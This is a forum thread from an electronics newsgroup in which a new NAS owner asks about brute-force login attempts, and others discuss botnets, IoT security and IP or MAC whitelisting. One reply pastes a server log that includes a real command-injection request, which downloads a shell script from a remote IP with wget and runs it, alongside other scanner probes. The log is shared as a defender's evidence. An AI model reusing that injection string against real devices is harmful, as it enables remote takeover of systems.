IP Ban List forever?

A little OT...

I recently installed a QNAP TVS-673e (8gb) for a special project upcoming.

Anyway, I'm fairly new to NAS systems generally, but managed to get this on e up and running without too much trouble.

My question is: I'm seeing a half-dozen or so security events every week or so. Usually, from Chinese IP address (if you believe those online look-up tools .?)

I've set the NAS to "ban forever" any access attempts with 5 failed login a ttempts, within 5 minutes (options are 1, 5, 10 and 30 minutes).

For IP's banned so far, they come in slightly different from each other:

112.85.42.201 112.85.42.102 112.85.42.230

42.7.27.162

42.7.27.163

etc...

So my question: Is there really some Chinese entity with nothing better to do that to conti nuously try to hack in my NAS?!

It's got to be random, right?

There is nothing on the NAS of any value (and practically no files at all y et). And good luck guessing my User Name and Password. At this rate, it will literally take them forever to get in.

BTW: Nice NAS. I'm impressed, even though I don't fully know how to use a ll of it. :)

?? (That's supposedly "Thanks" in Chinese. :)

Reply to
mpm
Loading thread data ...

mpm wrote in news: snipped-for-privacy@googlegroups.com:

ABSOLUTELY!

Also true, but once they 'find' an address that corresponds to a storage device (one step away from access), they trounce it.

So what gets randomized is the source ID "appearance".

You should ban the entire range and be done with it. In fact you should ban all access and set your access up on a MAC ID basis instead of other login methods.

You can then also encrypt the drive contents/volumes themselves.

Reply to
DecadentLinuxUserNumeroUno

mpm wrote

.....

118.184.63.4 "CN" China - - [09/Sep/2018:15:27:42 +0200] "POST /wuwu11.php HTTP/1.1" 404 526 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 73.91.40.171 "US" United States - - [09/Sep/2018:15:45:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://94.177.216.74/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 469 "-" "Hakai/2.0" 213.222.56.130 "BG" Bulgaria - - [09/Sep/2018:16:22:32 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 479 "-" "ZmEu" 115.231.219.28 "CN" China - - [09/Sep/2018:17:02:07 +0200] "GET /manager/html HTTP/1.1" 404 473 "-" "Mozilla/3.0 (compatible; Indy Library)" 176.42.7.160 "TR" Turkey - - [09/Sep/2018:18:12:52 +0200] "\x16\x03\x01\x02" 400 506 "-" "-" ..... All day long...

It is probably kiddies running scripts. These get automatically added to the firewall and so you see them only once. To make the firewall short I have now killed most of the Afrinic (Egypt based attacks) range, always on a different (dynamic) IP. If they cannot reach the server.. once I got contacted by some ISP they could not reach my server.... ONCE. The bad guys spoil it for the others,

Same here, normal invasion plans for the US, where I hide the plutonium, and how to beam up the Precedent, so nothing special. Do not have a NAS, just some 1TB USB disks, and run a Raspberry Pi backup server. This program detects the attacks and adds those to the firewall: http://217.120.43.67/panteltje/newsflex/download.html#ip_to_country I can make it so attacking IPs are reported to their ISP, with timestamp, but for example the US attacker is on comcast and they are to chicken to provide a contact email address in the whois query. China does. (type whois IPaddress)

Seems they scan Usenet for IPs.

Reply to
<698839253X6D445TD

I think you mean 8TB. $1,000. Linux desktop. Built in 4K video card? Ummm... is this really a work project?

No. No self respecting hacker would be caught using his own machines to port scan or attack someone else's machine. They always use a machine that was hijacked and compromised by a virus or malware. The hijacked machine does the scanning, and reports back too the mothership if it finds anything interesting. Often, it's over several hops and through multiple VPN's, making tracing the perpetrator almost impossible.

Question: If your NAS box is being attacked, what is it doing being exposed to the internet? Are you running an open ftp server or web server with port forwarding through your firewall? Bad idea unless you really need it.

I've seen sequential IP and port scans (using nmap) but usually, the scans and attacks are from international botnets that have random IP's.

IoT devices, such as NAS boxes, make tempting targets. They're basically a Linux computer and drive in a small box. If some blackmailer wants to setup your NAS box as a possible DoS (denial of service) attack platform, it can be done. I vaguely recall that a DoS attack was traced back to one manufacturers security cameras. More mundane, someone might want your CPU cycles to do some casual bitcoin mining, send out some spam, store stuff he stole off another machine, and so on. I doubt if they care about what's on your machine, but I'm sure they'll look around for anything interesting.

The problem with IoT boxes is that the manufacturers only issue firmware updates for a limited amount of time. A few years downstream, when some "security researcher" find some security problems in the firmware, it's too late as the product is no longer being supported by the manufacturer.

I'm envious.

--
Jeff Liebermann     jeffl@cruzio.com 
150 Felker St #D    http://www.LearnByDestroying.com 
 Click to see the full signature
Reply to
Jeff Liebermann

Jeff Liebermann wrote in news: snipped-for-privacy@4ax.com:

Yes, as in being attacked on other ports as well.

Reply to
DecadentLinuxUserNumeroUno

Random stupid Chinese crap. What I thought. I guess people do it because so many lazy people out there either use default passwords, or only use those requiring hardly any imagination.

The drives are encrypted, but yeah, I had to port-forward (Thanks AT&T U-Verse). :(

SSH, Telnet, FTP, SAMBA and AFP -- all OFF. Only HTTPS.

And I should have clarified: 8 GB RAM. (It comes off-the-shelf in two flavors, 4 GB and 8 GB, max it can hold is 64GB DDR4). I have it populated with QTY-(4) 4TB WD NAS drives.

Reply to
mpm

I'm pretty sure I can set it up to only allow connections from a whitelist of MAC addresses.

If so, next on my to-do list...

Reply to
mpm

I think you mean filter by IP address. Filtering by MAC addresses is useful for LAN security, limiting random wireless users, and vistors from accessing the NAS box. However, since MAC addresses do NOT go through a router, it does nothing for filtering machines on the WAN (internet) side of the router. Also, for LAN filtering, MAC addresses are easily spoofed and therefore offers little protection.

How (and Why) to Change Your MAC Address on Windows, Linux, and Mac

--
Jeff Liebermann     jeffl@cruzio.com 
150 Felker St #D    http://www.LearnByDestroying.com 
 Click to see the full signature
Reply to
Jeff Liebermann

That'd work, but OTOH you'de get much the same effect by taking it off the internet. (this is because MAC addresses are an ethernet thing, not an internet thing)

--
     ?
Reply to
Jasen Betts

What is the attack? An ssh login attempt? If so, then there's no way this is an accident. I run a web store and have all sorts of attacks. I currently have 6800 IP addresses that are on my hosts.deny list. These all got banned due to multiple failed attempts to ssh into the system. I put in the denyhosts program that tracks these failed attempts. It was VERY interesting to see that the attacks dropped enormously exactly 2 weeks after setting up denyhosts. So, they have a network of compromised machines (botnet) and probe your system to find out what your "horizon" is on ssh attempts. I guess if they see that you ban a particular IP after several failed attempts over a 2 week period, then they figure they will NEVER get in, and put out a notice somewhere on the dark web not to waste effort on your system.

I have also been pulled into a DDOS attack on the US government health coverage web site, where they spoof their IP and trick my system into sending large DNS responses to the target systems. I had to block a relatively small number of specific IPs with the firewall to cut that out. They were hitting me with several thousand DNS queries an hour and slowing down my internet service.

I have also had a problem with BaiduSpider, mostly, making an outrageous number of web page loads, and have had to block a few Chinese IPs. When

80% of my page loads are coming from ONE IP, something is definitely wrong. A web crawler has no NEED to load the same page thousands of times a day.

Jon

Reply to
Jon Elson

Yes, the IP whitelist will make the node totally disappear except to the whitelisted users. If this system is only to be available to prearranged users, this is the best way to solve the issue.

The MAC whitelist is just a bit more complicated, as you need to find out the MAC address of each approved user, and then if they need to access from a different machine, you have to enter that in your firewall.

Jon

Reply to
Jon Elson

MAC addresses may be easily spoofed, BUT, if you have NO IDEA what a very SMALL list of approved addresses are, the search space is RATHER large, in fact bigger than the range of IPV4 addresses. That would take somebody a LONG time to figure out. And, with the machine not responding AT ALL to any unapproved access, they won't even know it exists.

But, that will be true of an IP whitelist, too.

Jon

Reply to
Jon Elson

ElectronDepot website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.